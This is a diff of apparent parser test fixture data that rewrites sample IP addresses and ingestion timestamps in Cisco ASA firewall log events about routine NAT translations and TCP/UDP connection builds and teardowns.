@@ -10041,8 +10041,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165185400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288", + "ingested": "2021-12-09T13:33:41.995500500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10075,8 +10075,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10111,7 +10111,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10120,8 +10120,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165191900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", + "ingested": "2021-12-09T13:33:41.995505500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10137,7 +10137,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11810", "source_interface": "outside", "mapped_destination_port": 1284 @@ -10159,8 +10159,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10195,7 +10195,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10206,8 +10206,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165198600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", + "ingested": "2021-12-09T13:33:41.995509700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10244,8 +10244,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10280,7 +10280,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10291,8 +10291,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165205200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", + "ingested": "2021-12-09T13:33:41.995515200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10329,8 +10329,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10365,7 +10365,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10376,8 +10376,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165210900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", + "ingested": "2021-12-09T13:33:41.995521400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10409,8 +10409,8 @@ }, "destination": { "port": 8289, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1285, @@ -10450,7 +10450,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10458,8 +10458,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165219Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289", + "ingested": "2021-12-09T13:33:41.995526700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10492,8 +10492,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10528,7 +10528,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -10537,8 +10537,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165227100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", + "ingested": "2021-12-09T13:33:41.995532Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10554,7 +10554,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11811", "source_interface": "outside", "mapped_destination_port": 1285 @@ -10571,8 +10571,8 @@ }, "destination": { "port": 8290, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1286, @@ -10612,7 +10612,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10620,8 +10620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165232400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290", + "ingested": "2021-12-09T13:33:41.995537700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10654,8 +10654,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10690,7 +10690,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10699,8 +10699,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165237900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", + "ingested": "2021-12-09T13:33:41.995542900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10716,7 +10716,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11812", "source_interface": "outside", "mapped_destination_port": 1286 @@ -10738,8 +10738,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10774,7 +10774,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10785,8 +10785,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165243600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", + "ingested": "2021-12-09T13:33:41.995548300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -10818,8 +10818,8 @@ }, "destination": { "port": 8291, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1287, @@ -10859,7 +10859,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10867,8 +10867,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165251600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291", + "ingested": "2021-12-09T13:33:41.995554700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10901,8 +10901,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10937,7 +10937,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10946,8 +10946,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165259900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", + "ingested": "2021-12-09T13:33:41.995561100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -10963,7 +10963,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11813", "source_interface": "outside", "mapped_destination_port": 1287 @@ -10985,8 +10985,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11021,7 +11021,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11032,8 +11032,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165267900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", + "ingested": "2021-12-09T13:33:41.995567600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11070,8 +11070,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11106,7 +11106,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -11117,8 +11117,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165275700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", + "ingested": "2021-12-09T13:33:41.995573800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11155,8 +11155,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11191,7 +11191,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11200,8 +11200,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165280900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995580400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11217,7 +11217,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.107", + "mapped_source_ip": "192.168.100.107", "connection_id": "11814", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -11234,8 +11234,8 @@ }, "destination": { "port": 8292, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1288, @@ -11275,7 +11275,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11283,8 +11283,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165287600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292", + "ingested": "2021-12-09T13:33:41.995586500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11317,8 +11317,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11353,7 +11353,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11362,8 +11362,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165293400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", + "ingested": "2021-12-09T13:33:41.995592800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -11379,7 +11379,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11815", "source_interface": "outside", "mapped_destination_port": 1288 @@ -11401,8 +11401,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11437,7 +11437,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11447,8 +11447,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165301600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", + "ingested": "2021-12-09T13:33:41.995599Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11485,8 +11485,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11521,7 +11521,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, 
@@ -11530,8 +11530,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165309900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995605200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11547,7 +11547,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.104.8", + "mapped_source_ip": "192.168.104.8", "connection_id": "11816", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11569,8 +11569,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11605,7 +11605,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11615,8 +11615,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165316600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", + "ingested": "2021-12-09T13:33:41.995610700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -11648,8 +11648,8 @@ }, "destination": { "port": 8293, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1289, @@ -11689,7 +11689,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11697,8 +11697,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165324600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293", + "ingested": "2021-12-09T13:33:41.995614500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11731,8 +11731,8 @@ }, "source": { "port": 80, - "address": "100.66.123.191", - "ip": "100.66.123.191" + "address": "192.168.123.191", + "ip": "192.168.123.191" }, "tags": [ "preserve_original_event" @@ -11767,7 +11767,7 @@ "localhost" ], "ip": [ - "100.66.123.191", + "192.168.123.191", "172.31.98.44" ] }, @@ -11776,8 +11776,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165332600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", + "ingested": "2021-12-09T13:33:41.995619400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -11793,7 +11793,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.123.191", + "mapped_source_ip": "192.168.123.191", "connection_id": "11817", "source_interface": "outside", "mapped_destination_port": 1289 @@ -11815,8 +11815,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11851,7 +11851,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11862,8 +11862,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165340600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", + "ingested": "2021-12-09T13:33:41.995625200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11900,8 +11900,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11936,7 +11936,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -11947,8 +11947,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165403100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", + "ingested": "2021-12-09T13:33:41.995632300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11985,8 +11985,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12021,7 +12021,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12030,8 +12030,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165407Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995636700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12047,7 +12047,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11818", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -12069,8 +12069,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12105,7 +12105,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12115,8 +12115,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165412400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:33:41.995641800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12148,8 +12148,8 @@ }, "destination": { "port": 8294, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1290, @@ -12189,7 +12189,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -12197,8 +12197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165430900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294", + "ingested": "2021-12-09T13:33:41.995648300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -12231,8 +12231,8 @@ }, "source": { "port": 80, - "address": "100.66.198.25", - "ip": "100.66.198.25" + "address": "192.168.198.25", + "ip": "192.168.198.25" }, "tags": [ "preserve_original_event" 
@@ -12267,7 +12267,7 @@ "localhost" ], "ip": [ - "100.66.198.25", + "192.168.198.25", "172.31.98.44" ] }, @@ -12276,8 +12276,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165439100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", + "ingested": "2021-12-09T13:33:41.995653200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -12293,7 +12293,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.25", + "mapped_source_ip": "192.168.198.25", "connection_id": "11819", "source_interface": "outside", "mapped_destination_port": 1290 @@ -12315,8 +12315,8 @@ }, "source": { "port": 67, - "address": "100.66.48.1", - "ip": "100.66.48.1" + "address": "192.168.48.1", + "ip": "192.168.48.1" }, "tags": [ "preserve_original_event" @@ -12351,7 +12351,7 @@ "localhost" ], "ip": [ - "100.66.48.1", + "192.168.48.1", "255.255.255.255" ] }, @@ -12361,8 +12361,8 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-10-06T20:55:00.165447100Z", - "original": "Oct 